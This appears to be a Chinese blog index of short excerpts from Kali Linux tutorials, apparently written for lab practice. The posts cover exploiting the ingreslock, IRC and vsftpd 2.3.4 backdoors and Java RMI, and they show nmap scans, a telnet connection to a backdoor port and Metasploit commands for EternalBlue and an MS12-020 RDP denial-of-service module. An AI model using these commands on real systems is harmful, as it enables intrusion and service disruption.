KALI

【教程】ingreslock后门利用

阅读(434)评论(0)

ingreslock后门利用 介绍:百度搜不到.............. 一.扫描端口 nmap -p 1524 192.168.84.128 二.漏洞利用。 1.可直接通过telnet连接 telnet 192.168.84.128 1524 2.也可以通过nc...

KALI

【教程】irc后门利用

阅读(505)评论(0)

  irc后门利用 IRC后门病毒是一种网络病毒。一方面有潜在的泄漏本地信息的危险,另一方面病毒出现在局域网中使网络阻塞,影响正常工作,从而造成损失。该病毒源码稍加修改就可编译生成一个全新的病毒,再加上不同的壳,造成IRC后门病毒变种大量涌现。还有一些病毒每次运行后都会进行变形成为新的病毒。(来源:百度百科) ...

KALI

【教程】Java_Rmi漏洞利用

阅读(312)评论(0)

Java_Rmi漏洞利用 Java RMI,即 远程方法调用(Remote Method Invocation),一种用于实现远程过程调用(RPC)(Remote procedure call)的Java API, 能直接传输序列化后的Java对象和分布式垃圾收集。它的实现依赖于Java虚拟机(JVM),因此它仅支持从一个J...

KALI

【教程】vsftp2.3.4后门利用

阅读(806)评论(1)

vsftp2.3.4后门利用 简介 VSFTP是一个基于GPL发布的类Unix系统上使用的FTP服务器软件,它的全称是Very Secure FTP 从此名称可以看出来,编制者的初衷是代码的安全。(来源:百度百科) 一、手动利用 1.扫描vsftp版本号 nmap -p 21 -...

KALI

【教程】msf基本命令

阅读(23434)评论(0)

msfconsole基本命令 1.查找模块 search name 2.选择模块 use exploit/windows/smb/ms17_010_eternalblue 3.查看攻击范围(受影响主机) show targets 4.列出所有选项 show options ...

KALI

【教程】msf数据库基本命令

阅读(8678)评论(0)

msf数据库基本命令 1.启动数据库 service postgresql start 2.查看数据库状态 service postgresql status 3.初始化数据库(这里已经提前初始化了,所以提示会不一样) msfdb init 4.查看是否连接成功 db_status ...

KALI

【教程】nmap扫描基础

阅读(629)评论(0)

nmap扫描基础 1.扫描存活主机(ping) nmap -sP 192.168.186.0/24 2.半开放式扫描 nmap -sS 192.168.186.129 3.不Ping式扫描 nmap -Pn 192.168.186.129 4.探测端口服务版本 nmap -sV 192.168.186.129 ...

KALI

【教程】ms12_020蓝屏攻击

阅读(673)评论(0)

metasploit蓝屏攻击 win2008 IP:192.168.186.129 (需开启3389端口) 1.启动msf msfconsole 2.选择攻击模块 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids ...